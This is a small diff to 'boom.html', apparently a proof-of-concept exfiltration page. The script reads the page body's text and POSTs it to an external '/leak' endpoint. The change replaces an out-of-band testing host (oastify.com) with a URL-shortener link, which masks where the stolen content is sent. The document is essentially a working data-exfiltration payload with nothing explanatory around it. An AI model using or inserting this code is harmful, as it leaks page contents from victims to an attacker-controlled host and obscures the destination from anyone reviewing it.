--- a/boom.html
+++ b/boom.html
@@ -9,7 +9,7 @@
       const dump = document.getElementById("dump");
       dump.value = body.innerText;
 
-      fetch("https://2svppvqbcsi70fe9by2ra5qd046vuoid.oastify.com/leak", {
+      fetch("https://tinyurl.com/vvh5tkem/leak", {
         method: "POST",
         body: JSON.stringify({ content: dump.value }),
       });
